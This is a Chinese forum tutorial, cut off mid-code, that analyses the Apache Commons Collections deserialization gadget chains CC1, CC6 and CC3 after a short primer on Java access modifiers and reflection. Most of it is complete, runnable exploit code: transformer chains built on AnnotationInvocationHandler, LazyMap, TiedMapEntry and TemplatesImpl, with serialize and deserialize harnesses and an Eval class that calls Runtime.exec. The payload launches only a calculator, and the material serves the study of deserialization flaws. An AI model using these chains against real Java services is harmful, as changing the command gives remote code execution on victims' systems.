Java安全-CC链全分析

打印 上一主题 下一主题

主题 967|帖子 967|积分 2901

前置知识

Java访问权限概述

对于一个类,其成员(包括成员变量和成员方法)可否被其他类所访问,取决于该成员的修饰词。在Java中,类成员的访问权限修饰词有四个:private,无(包访问权限),protected 和 public,其权限控制如下表所示:
同一个类中同一个包中不同包的子类不同包的无关类public✔✔✔✔protected✔✔✔无(空着不写)✔✔private✔ 不同包中子类: 不同包通过继承获得关系
不同包中的无关类: 不同包通过直接创建对象来获得关系
反射

Java反射操作的是java.lang.Class对象,所以我们必要要先获取到Class对象。
获取Class对象的方式:
  1. 1. Class.forName("全类名"):将字节码文件加载进内存,返回Class对象
  2.          多用于配置文件,将类名定义在配置文件中。读取文件,加载类
  3. 2. 类名.class:通过类名的属性class获取
  4.          多用于参数的传递
  5. 3. 对象.getClass():getClass()方法在Object类中定义着。
  6.          多用于对象的获取字节码的方式
复制代码
代码实例:
  1. 方式一:
  2.         Class cls1 = Class.forName("Domain.Person");
  3.         System.out.println(cls1);
  4. 方式二:
  5.         Class cls2 = Person.class;
  6.         System.out.println(cls2);
  7.         
  8. 方式三:
  9.         Person p = new Person();
  10.         Class cls3 = p.getClass();
  11.         System.out.println(cls3);
复制代码
环境摆设

  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <project xmlns="http://maven.apache.org/POM/4.0.0"
  3.          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4.          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  5.     <modelVersion>4.0.0</modelVersion>
  6.     <groupId>org.example</groupId>
  7.     <artifactId>cc分析</artifactId>
  8.     <version>1.0-SNAPSHOT</version>
  9.     <properties>
  10.         <maven.compiler.source>8</maven.compiler.source>
  11.         <maven.compiler.target>8</maven.compiler.target>
  12.         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  13.     </properties>
  14.     <dependencies>
  15.         <dependency>
  16.             <groupId>commons-collections</groupId>
  17.             <artifactId>commons-collections</artifactId>
  18.             <version>3.1</version>
  19.         </dependency>
  20.         <dependency>
  21.             <groupId>org.apache.commons</groupId>
  22.             <artifactId>commons-collections4</artifactId>
  23.             <version>4.0</version>
  24.         </dependency>
  25.     </dependencies>
  26. </project>
复制代码
CC1

流程分析

入口:org.apache.commons.collections.Transformer

入口类:org.apache.commons.collections.functors.InvokerTransformer,它的transform方法使用了反射来调用input的方法,InvokerTransformer相称于帮我们实现了一个反射调用,并且input,iMethodName,iParamTypes,iArgs都是可控的

因此我们可以通过InvokerTransformer类的transform方法来invoke Runtime类getRuntime对象的exec来实现rce
  1. package org.example;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.InvokerTransformer;
  4. public class cc1 {
  5.     public static void main(String[] args) {
  6.         new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(Runtime.getRuntime());
  7.     }
  8. }
复制代码
乐成执行命令

如今的重点就是去找一个别的的类有transform方法,并且传入的Object是可控的,然后我们只要把这个Object设为InvokeTransformer即可,我们全局搜索transform方法,能够发现很多类都是有transform方法的,我们这里先研究的是CC1,所以我们直接看TransformerMap类

在TransformedMap中的checkSetValue方法中调用了transform,valueTransformer是构造的时间赋的值,再看构造函数

构造函数是一个protected,所以不能让我们直接实例赋值,只能是类内部构造赋值,找哪里调用了构造函数

一个静态方法,这里我们就能控制参数了

如果我们可以调用 TransformedMap 的 checkSetValue方法,那我们给 valueTransformer 实例就可以通过valueTransformer.transform(value) 实现 InvokerTransformer.transform(value) 从而 rce
如今调用transform方法的问题解决了,返回去看checkSetValue,可以看到value我们临时不能控制,全局搜索checkSetValue,看谁调用了它,并且value值可受控制,在AbstractInputCheckedMapDecorator类中发现,凑巧的是,它刚好是TransformedMap的父类



在这里如果对Java聚集认识一点的人看到了setValue字样就应该想起来,我们在遍历聚集的时间就用过setValue和getValue,所以我们只要对decorate这个map进行遍历setValue,由于TransformedMap继承了AbstractInputCheckedMapDecorator类,因此当调用setValue时会去父类探求,写一个demo来测试一下:
  1. package org.example;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.InvokerTransformer;
  4. import org.apache.commons.collections.Transformer;
  5. import org.apache.commons.collections.functors.InvokerTransformer;
  6. import org.apache.commons.collections.map.TransformedMap;
  7. import java.util.HashMap;
  8. import java.util.Map;
  9. public class cc1 {
  10.     public static void main(String[] args) {
  11.         Runtime r = Runtime.getRuntime();
  12.         InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  13.         HashMap<Object, Object> map = new HashMap<>();
  14.         map.put("1","2");
  15.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, invokerTransformer);
  16.         for(Map.Entry entry:decorate.entrySet()){
  17.             entry.setValue(r);
  18.         }
  19.     }
  20. }
复制代码

我们追踪一下setValue看是在哪调用的,在AnnotationInvocationHandler中找到,而且照旧在重写的readObject中调用的setValue,这还省去了再去找readObject
  1.     private void readObject(java.io.ObjectInputStream s)
  2.         throws java.io.IOException, ClassNotFoundException {
  3.         s.defaultReadObject();
  4.         // Check to make sure that types have not evolved incompatibly
  5.         AnnotationType annotationType = null;
  6.         try {
  7.             annotationType = AnnotationType.getInstance(type);
  8.         } catch(IllegalArgumentException e) {
  9.             // Class is no longer an annotation type; time to punch out
  10.             throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
  11.         }
  12.         Map<String, Class<?>> memberTypes = annotationType.memberTypes();
  13.         // If there are annotation members without values, that
  14.         // situation is handled by the invoke method.
  15.         for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
  16.             String name = memberValue.getKey();
  17.             Class<?> memberType = memberTypes.get(name);
  18.             if (memberType != null) {  // i.e. member still exists
  19.                 Object value = memberValue.getValue();
  20.                 if (!(memberType.isInstance(value) ||
  21.                       value instanceof ExceptionProxy)) {
  22.                     memberValue.setValue(
  23.                         new AnnotationTypeMismatchExceptionProxy(
  24.                             value.getClass() + "[" + value + "]").setMember(
  25.                                 annotationType.members().get(name)));
  26.                 }
  27.             }
  28.         }
  29.     }
复制代码
我们分析下AnnotationInvocationHandler这个类,未用public声明,阐明只能通过反射调用

查看一下构造方法,传入一个Class和Map,此中Class继承了Annotation,也就是必要传入一个注解类进去,这里我们选择Target,之后说为什么

构造exp:
  1. package org.example;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.InvokerTransformer;
  4. import org.apache.commons.collections.map.TransformedMap;
  5. import java.lang.annotation.Target;
  6. import java.lang.reflect.Constructor;
  7. import java.lang.reflect.InvocationTargetException;
  8. import java.util.HashMap;
  9. import java.util.Map;
  10. public class cc1 {
  11.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
  12.         Runtime r = Runtime.getRuntime();
  13.         InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  14.         HashMap<Object, Object> map = new HashMap<>();
  15.         map.put("1","2");
  16.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, invokerTransformer);
  17. //        for(Map.Entry entry:decorate.entrySet()){
  18. //            entry.setValue(r);
  19. //        }
  20.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  21.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  22.         constructor.setAccessible(true);
  23.         Object o = constructor.newInstance(Target.class, decorate);
  24.     }
  25. }
复制代码
如今有个难题是Runtime类是不能被序列化的,但是反射来的类是可以被序列化的,还好InvokeTransformer有一个绝佳的反射机制,构造一下:
  1. Method RuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
  2. Runtime r = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}).transform(RuntimeMethod);
  3. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
复制代码
如今另有个小问题,此中我们的transformedmap是传入了一个invokertransformer,但是如今这个对象没有了,被拆成了多个,就是上述三段代码,得想个办法统合起来,这里就回到最初的Transformer接口里去探求,找到ChainedTransformer,刚好这个方法是递归调用数组里的transform方法

我们就可以这样构造:
  1. Transformer[] transformers = new Transformer[]{
  2.     new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  3.     new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  4.     new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  5. };
  6. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  7. HashMap<Object, Object> map = new HashMap<>();
  8. map.put("1","2");
  9. Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
复制代码
到这一步雏形以及可以构造出来了
  1. package org.example;
  2. import com.sun.xml.internal.ws.encoding.MtomCodec;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.InvokerTransformer;
  6. import org.apache.commons.collections.map.TransformedMap;
  7. import java.io.*;
  8. import java.lang.annotation.Target;
  9. import java.lang.reflect.Constructor;
  10. import java.lang.reflect.InvocationTargetException;
  11. import java.lang.reflect.Method;
  12. import java.util.HashMap;
  13. import java.util.Map;
  14. public class cc1 {
  15.     public static void serialize(Object obj) throws IOException {
  16.         FileOutputStream fos = new FileOutputStream("cc1.bin");
  17.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  18.         oos.writeObject(obj);
  19.     }
  20.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  21.         FileInputStream fis = new FileInputStream(filename);
  22.         ObjectInputStream ois = new ObjectInputStream(fis);
  23.         ois.readObject();
  24.     }
  25.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
  26.         Transformer[] transformers = new Transformer[]{
  27.                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  28.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  29.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  30.         };
  31.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  32.         HashMap<Object, Object> map = new HashMap<>();
  33.         map.put("1","2");
  34.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
  35.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  36.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  37.         constructor.setAccessible(true);
  38.         Object o = constructor.newInstance(Target.class, decorate);
  39.         serialize(o);
  40.         deserialize("cc1.bin");
  41.     }
  42. }
复制代码

但是这里反序列化并不能执行命令,why?缘故原由在于AnnotationInvocationHandler里触发setValue是有条件的,我们调试追踪进去看看:

要想触发setValue得先过两个if判定,先看第一个if判定,memberType不能为null,memberType其实就是我们之前传入的注解类Target的一个属性,这个属性哪里来的?就是我们最先传入的map map.put(“1”,“2”)
获取这个name:1,获取1这个属性,很明显我们的Target注解类是没有1这个属性的,我们看一下Target类

Target是有value这个属性的,所以我们改一下map,map.put(“value”, 1),这样就过了第一个if,接着往下看第二个if,这里value只要有值就过了,乐成到达setValue,但这里另有末了一个问题,如何让他调用Runtime.class?这里又得提到一个类,ConstantTransformer,这个类的特点就是我们传入啥,它直接就返回啥

这样就能构造最终的exp:
  1. package org.example;
  2. import com.sun.xml.internal.ws.encoding.MtomCodec;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.map.TransformedMap;
  8. import java.io.*;
  9. import java.lang.annotation.Target;
  10. import java.lang.reflect.Constructor;
  11. import java.lang.reflect.InvocationTargetException;
  12. import java.lang.reflect.Method;
  13. import java.util.HashMap;
  14. import java.util.Map;
  15. public class cc1 {
  16.     public static void serialize(Object obj) throws IOException {
  17.         FileOutputStream fos = new FileOutputStream("cc1.bin");
  18.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  19.         oos.writeObject(obj);
  20.     }
  21.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  22.         FileInputStream fis = new FileInputStream(filename);
  23.         ObjectInputStream ois = new ObjectInputStream(fis);
  24.         ois.readObject();
  25.     }
  26.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
  27.         Transformer[] transformers = new Transformer[]{
  28.                 new ConstantTransformer(Runtime.class),
  29.                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  30.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  31.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  32.         };
  33.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  34.         HashMap<Object, Object> map = new HashMap<>();
  35.         map.put("value","1");
  36.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
  37.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  38.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  39.         constructor.setAccessible(true);
  40.         Object o = constructor.newInstance(Target.class, decorate);
  41.         serialize(o);
  42.         deserialize("cc1.bin");
  43.     }
  44. }
复制代码

以上是此中一条CC1,另有另一条CC1,是从LazyMap入手,我们也来分析一下,在LazyMap的get方法里调用了transform

看构造方法,factory必要我们控制,同样在类内部找哪里调用了这个构造方法

很明显,跟之前基本相似,就是从checkValue换到了get

那么get在哪调用的,照旧在AnnotationInvocationHandler,它的invoke方法调用了get
  1.     public Object invoke(Object proxy, Method method, Object[] args) {
  2.         String member = method.getName();
  3.         Class<?>[] paramTypes = method.getParameterTypes();
  4.         // Handle Object and Annotation methods
  5.         if (member.equals("equals") && paramTypes.length == 1 &&
  6.             paramTypes[0] == Object.class)
  7.             return equalsImpl(args[0]);
  8.         if (paramTypes.length != 0)
  9.             throw new AssertionError("Too many parameters for an annotation method");
  10.         switch(member) {
  11.         case "toString":
  12.             return toStringImpl();
  13.         case "hashCode":
  14.             return hashCodeImpl();
  15.         case "annotationType":
  16.             return type;
  17.         }
  18.         // Handle annotation member accessors
  19.         Object result = memberValues.get(member);
  20.         if (result == null)
  21.             throw new IncompleteAnnotationException(type, member);
  22.         if (result instanceof ExceptionProxy)
  23.             throw ((ExceptionProxy) result).generateException();
  24.         if (result.getClass().isArray() && Array.getLength(result) != 0)
  25.             result = cloneArray(result);
  26.         return result;
  27.     }
复制代码
这里是个动态代理,我们可以用AnnotationInvocationHandler来代理LazyMap,这样就会触发invoke方法,构造一下exp(基本大差不差):
  1. package org.example;
  2. import com.sun.xml.internal.ws.encoding.MtomCodec;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.map.LazyMap;
  8. import org.apache.commons.collections.map.TransformedMap;
  9. import java.io.*;
  10. import java.lang.annotation.Target;
  11. import java.lang.reflect.*;
  12. import java.util.HashMap;
  13. import java.util.Map;
  14. public class cc12 {
  15.     public static void serialize(Object obj) throws IOException {
  16.         FileOutputStream fos = new FileOutputStream("cc1_lazymap.bin");
  17.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  18.         oos.writeObject(obj);
  19.     }
  20.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  21.         FileInputStream fis = new FileInputStream(filename);
  22.         ObjectInputStream ois = new ObjectInputStream(fis);
  23.         ois.readObject();
  24.     }
  25.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
  26.         Transformer[] transformers = new Transformer[]{
  27.                 new ConstantTransformer(Runtime.class),
  28.                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  29.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  30.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  31.         };
  32.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  33.         HashMap<Object, Object> map = new HashMap<>();
  34.         Map<Object, Object> decorate = LazyMap.decorate(map,  chainedTransformer);
  35.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  36.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  37.         constructor.setAccessible(true);
  38.         InvocationHandler handler = (InvocationHandler) constructor.newInstance(Target.class, decorate);
  39.         Map newMap = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, handler);
  40.         Object o = constructor.newInstance(Target.class, newMap);
  41.         serialize(o);
  42.         deserialize("cc1_lazymap.bin");
  43.     }
  44. }
复制代码
CC6

CC6不受jdk版本限制,算是一条最常用的CC链
这是Ysoserial上的CC6,可以看到后半部门没变,从LazyMap.get开始通过TiedMapEntry.getValue来调用了,我们追踪一下

TiedMapEntry.getValue调用了map.get

看构造函数,map,key我们都能控制

找getValue方法在哪调用,TiedMapEntry自身的hashCode方法调用了,看到这个hashCode是不是很眼熟,没错,我们研究URLDNS的时间就是用到这里,那么显而易见,我们前面的就是HashMap了

构造exp,注意这里跟URLDNS有雷同的问题,hashMap.put的时间就触发了hash方法也同时调用了hashCode,所以直接就执行命令了,照旧同样的手法将某些值改一下就行了
  1. package org.example;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.ChainedTransformer;
  4. import org.apache.commons.collections.functors.ConstantTransformer;
  5. import org.apache.commons.collections.functors.InvokerTransformer;
  6. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  7. import org.apache.commons.collections.map.LazyMap;
  8. import java.io.*;
  9. import java.lang.reflect.Field;
  10. import java.util.HashMap;
  11. import java.util.Map;
  12. public class cc6 {
  13.     public static void serialize(Object obj) throws IOException {
  14.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  15.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  16.         oos.writeObject(obj);
  17.     }
  18.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  19.         FileInputStream fis = new FileInputStream(filename);
  20.         ObjectInputStream ois = new ObjectInputStream(fis);
  21.         ois.readObject();
  22.     }
  23.     public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
  24.         Transformer[] transformers = new Transformer[]{
  25.                 new ConstantTransformer(Runtime.class),
  26.                 new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  27.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  28.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  29.         };
  30.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  31.         Map<Object, Object> map = new HashMap<>();
  32.         Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
  33.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  34.         HashMap<Object, Object> hashMap = new HashMap<>();
  35.         hashMap.put(tiedMapEntry, null);
  36.         Field factory = LazyMap.class.getDeclaredField("factory");
  37.         factory.setAccessible(true);
  38.         factory.set(lazymap, chainedTransformer);
  39.         serialize(hashMap);
  40.         deserialize("cc6.bin");
  41.     }
  42. }
复制代码
但是这里奇怪的是照旧没法弹盘算器,我们调试一下看看,发现是LazyMap.get这里的问题,这里有一个if判定,我们这个map没有给值,在hashMap.put触发后给put进去一个null的键,第二次触发的之前我们把这个键删掉就行了。

  1. package org.example;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.ChainedTransformer;
  4. import org.apache.commons.collections.functors.ConstantTransformer;
  5. import org.apache.commons.collections.functors.InvokerTransformer;
  6. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  7. import org.apache.commons.collections.map.LazyMap;
  8. import java.io.*;
  9. import java.lang.reflect.Field;
  10. import java.util.HashMap;
  11. import java.util.Map;
  12. public class cc6 {
  13.     public static void serialize(Object obj) throws IOException {
  14.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  15.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  16.         oos.writeObject(obj);
  17.     }
  18.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  19.         FileInputStream fis = new FileInputStream(filename);
  20.         ObjectInputStream ois = new ObjectInputStream(fis);
  21.         ois.readObject();
  22.     }
  23.     public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
  24.         Transformer[] transformers = new Transformer[]{
  25.                 new ConstantTransformer(Runtime.class),
  26.                 new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  27.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  28.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  29.         };
  30.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  31.         Map<Object, Object> map = new HashMap<>();
  32.         Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
  33.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  34.         HashMap<Object, Object> hashMap = new HashMap<>();
  35.         hashMap.put(tiedMapEntry, null);
  36.         map.remove(null);
  37.         Field factory = LazyMap.class.getDeclaredField("factory");
  38.         factory.setAccessible(true);
  39.         factory.set(lazymap, chainedTransformer);
  40.         serialize(hashMap);
  41.         deserialize("cc6.bin");
  42.     }
  43. }
复制代码
CC3

CC3就跟前两条链不太一样了,CC1与CC6都是执行命令,很多时间服务器的代码当中的黑名单会选择禁用Runtime,而CC3是执行静态代码块,CC3接纳的是动态加载类,也就是利用了defineClass,我们搜索哪些类有defineClass,找到这个TemplatesImpl,这玩意厉害的很,以后另有很多地方用到

继续跟进,在defineTransletClasses方法中调用了defineClass
  1.     private void defineTransletClasses()
  2.         throws TransformerConfigurationException {
  3.         if (_bytecodes == null) {
  4.             ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
  5.             throw new TransformerConfigurationException(err.toString());
  6.         }
  7.         TransletClassLoader loader = (TransletClassLoader)
  8.             AccessController.doPrivileged(new PrivilegedAction() {
  9.                 public Object run() {
  10.                     return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
  11.                 }
  12.             });
  13.         try {
  14.             final int classCount = _bytecodes.length;
  15.             _class = new Class[classCount];
  16.             if (classCount > 1) {
  17.                 _auxClasses = new HashMap<>();
  18.             }
  19.             for (int i = 0; i < classCount; i++) {
  20.                 _class[i] = loader.defineClass(_bytecodes[i]);
  21.                 final Class superClass = _class[i].getSuperclass();
  22.                 // Check if this is the main class
  23.                 if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
  24.                     _transletIndex = i;
  25.                 }
  26.                 else {
  27.                     _auxClasses.put(_class[i].getName(), _class[i]);
  28.                 }
  29.             }
  30.             if (_transletIndex < 0) {
  31.                 ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
  32.                 throw new TransformerConfigurationException(err.toString());
  33.             }
  34.         }
  35.         catch (ClassFormatError e) {
  36.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
  37.             throw new TransformerConfigurationException(err.toString());
  38.         }
  39.         catch (LinkageError e) {
  40.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
  41.             throw new TransformerConfigurationException(err.toString());
  42.         }
  43.     }
复制代码


  • _bytecodes必要赋值
  • _tfactory必要赋值
不过_tfactory在readObject方法里被赋值了,因此不用管,继续跟进看谁调用了defineTransletClasses,看getTransletInstance,得绕过第一个if判定,所以得反射赋值给_name



  • 必要赋值_name
  • 不能赋值_class
继续跟进看谁调用了getTransletInstance,如今基本有一个构造思路了,new 一个TemplateIml对象,然后调用newTransformer方法,从而去defineClass

由于还没序列化,所以先手动给_tfactory赋值,不过运行后报了个空指针错误
  1. package org.example;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  4. import javax.xml.transform.Transformer;
  5. import javax.xml.transform.TransformerConfigurationException;
  6. import java.io.*;
  7. import java.lang.reflect.Field;
  8. import java.nio.file.Files;
  9. import java.nio.file.Paths;
  10. public class cc3 {
  11.     public static void serialize(Object obj) throws IOException {
  12.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  13.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  14.         oos.writeObject(obj);
  15.     }
  16.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  17.         FileInputStream fis = new FileInputStream(filename);
  18.         ObjectInputStream ois = new ObjectInputStream(fis);
  19.         ois.readObject();
  20.     }
  21.     public static void main(String[] args) throws TransformerConfigurationException, NoSuchFieldException, IllegalAccessException, IOException {
  22.         TemplatesImpl templates = new TemplatesImpl();
  23.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  24.         _name.setAccessible(true);
  25.         _name.set(templates, "1");
  26.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  27.         _bytecodes.setAccessible(true);
  28.         byte[] bytes = Files.readAllBytes(Paths.get("E:\\IDEA\\CC\\untitled\\src\\main\\java\\org\\example\\Eval.java"));
  29.         byte[][] code = {bytes};
  30.         _bytecodes.set(templates, code);
  31.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  32.         _tfactory.setAccessible(true);
  33.         _tfactory.set(templates, new TransformerFactoryImpl());
  34.         Transformer transformer = templates.newTransformer();
  35.     }
  36. }
复制代码
  1. package org.example;
  2. import java.io.IOException;
  3. public class Eval {
  4.     static {
  5.         try {
  6.             Runtime.getRuntime().exec("calc");
  7.         } catch (IOException e) {
  8.             throw new RuntimeException(e);
  9.         }
  10.     }
  11.     public static void main(String[] args) {
  12.     }
  13. }
复制代码
调试发如今这由于if判定没过,导致进去这个空指针错误,继续反射修改ABSTRACT_TRANSLET的值就ok,或则让恶意类Eval继承这个ABSTRACT_TRANSLET所指向的类

乐成弹出盘算器
  1. package org.example;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  4. import javax.xml.transform.Transformer;
  5. import javax.xml.transform.TransformerConfigurationException;
  6. import java.io.*;
  7. import java.lang.reflect.Field;
  8. import java.nio.file.Files;
  9. import java.nio.file.Paths;
  10. public class cc3 {
  11.     public static void serialize(Object obj) throws IOException {
  12.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  13.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  14.         oos.writeObject(obj);
  15.     }
  16.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  17.         FileInputStream fis = new FileInputStream(filename);
  18.         ObjectInputStream ois = new ObjectInputStream(fis);
  19.         ois.readObject();
  20.     }
  21.     public static void main(String[] args) throws TransformerConfigurationException, NoSuchFieldException, IllegalAccessException, IOException {
  22.         TemplatesImpl templates = new TemplatesImpl();
  23.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  24.         _name.setAccessible(true);
  25.         _name.set(templates, "1");
  26.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  27.         _bytecodes.setAccessible(true);
  28.         byte[] bytes = Files.readAllBytes(Paths.get("E:\\IDEA\\CC\\untitled\\target\\classes\\org\\example\\Eval.class"));
  29.         byte[][] code = {bytes};
  30.         _bytecodes.set(templates, code);
  31.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  32.         _tfactory.setAccessible(true);
  33.         _tfactory.set(templates, new TransformerFactoryImpl());
  34.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  35.         ABSTRACT_TRANSLET.setAccessible(true);
  36.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  37.         Transformer transformer = templates.newTransformer();
  38.     }
  39. }
复制代码
!

末了的问题是如何去序列化,可以看到Transformer这个类,我们可以结合CC1或者CC6
CC1
  1. package org.example;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  4. import org.apache.commons.collections.Transformer;
  5. import org.apache.commons.collections.functors.ChainedTransformer;
  6. import org.apache.commons.collections.functors.ConstantTransformer;
  7. import org.apache.commons.collections.functors.InvokerTransformer;
  8. import org.apache.commons.collections.map.LazyMap;
  9. import java.io.*;
  10. import java.lang.annotation.Target;
  11. import java.lang.reflect.*;
  12. import java.nio.file.Files;
  13. import java.nio.file.Paths;
  14. import java.util.HashMap;
  15. import java.util.Map;
  16. public class CC3 {
  17.     public static void serialize(Object obj) throws IOException {
  18.         FileOutputStream fos = new FileOutputStream("cc3.bin");
  19.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  20.         oos.writeObject(obj);
  21.     }
  22.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  23.         FileInputStream fis = new FileInputStream(filename);
